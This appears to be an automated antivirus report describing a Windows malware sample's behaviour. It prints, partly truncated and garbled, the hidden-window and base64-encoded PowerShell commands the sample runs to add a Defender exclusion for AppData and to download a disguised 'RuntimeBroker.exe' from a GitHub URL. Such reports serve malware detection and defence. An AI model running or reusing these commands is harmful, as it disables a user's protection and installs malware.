Technical Information
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $envԺUSERPROFILE\AppData -FORCE ; InvɯЫe-WebRequest -Uri 'https://github.com/topbruh/js/raw/refs/heads/main/RuntimeBroker.exe' -OutFile 'Ðâ°LE\AppData\Runti...
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c Powershell -w h -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAd...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $envԺUSERPROFILE\AppData -FORCE ; InvɯЫe-WebRequest -Uri 'https://github.com/topbruh/js/raw/refs/heads/main/RuntimeBroker.exe' -OutFile 'Ðâ°LE\AppData\Runti...' (with hidden window)
